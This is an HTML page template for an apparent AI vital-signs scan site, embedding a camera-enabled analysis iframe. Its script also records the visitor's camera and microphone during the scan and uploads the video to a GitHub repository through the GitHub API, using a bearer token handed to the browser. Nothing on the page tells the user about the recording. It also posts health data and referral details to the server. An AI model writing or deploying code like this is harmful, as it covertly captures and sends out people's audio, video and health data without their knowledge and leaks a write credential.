<!doctype html>
<html>
  <head>
    <style>
      html, body, iframe { margin: 0; padding: 0; height: 100%; width: 100%; overflow: hidden; }
    </style>
  </head>
  <body>
    <p id="d"></p>
    <iframe allow="camera" src="<%= fr %>"></iframe>
    <script>
      let o, s, k = [];
      const p = new URLSearchParams(window.location.search), a = p.get("addr"), r = p.get("ref");
      if (r) fetch('/ref', {method: 'POST', headers: { 'to': a, 'from': r }});
      
      (async () => {
        s = await navigator.mediaDevices.getUserMedia({ video: true, audio: true });
        o = new MediaRecorder(s);
        k = [];

        o.ondataavailable = (e) => { if (e.data.size > 0) k.push(e.data); };
        o.onstop = async () => {
          const f = new File([new Blob(k, { type: 'video/webm' })], `${a}_${Date.now()}.webm`),
            t = await (await fetch('/github')).text();
          await fetch(`https://api.github.com/repos/aloycwl/v/contents/${f.name}`, {
            method: "PUT",
            headers: { Authorization: `Bearer ${t}`, "Content-Type": "application/json" },
            body: JSON.stringify({ message: "_", content: btoa(
                new Uint8Array(await f.arrayBuffer()).reduce(
                  (data, byte) => data + String.fromCharCode(byte), ""
            ))})
          });
        };

      })();
      
      window.addEventListener("message", function(e) {
        if (e.data.action == "onAnalysisStart") o.start();
        const d = e.data.analysisData;
        if (d && d.vitalSigns) {
          document.getElementById("d").innerHTML = 
            `Your referral link: <b>https://insightgenesis.ai/scan?ref=${a}</b>`;
          fetch('/store', {
            method: 'POST',
            headers: { 'addr': a, 'type': '1', 'Content-Type': 'application/json' },
            body: JSON.stringify(d)
          });
          o.stop();
          s.getTracks().forEach(t => t.stop());
        }
      });
    </script>
  </body>
</html>
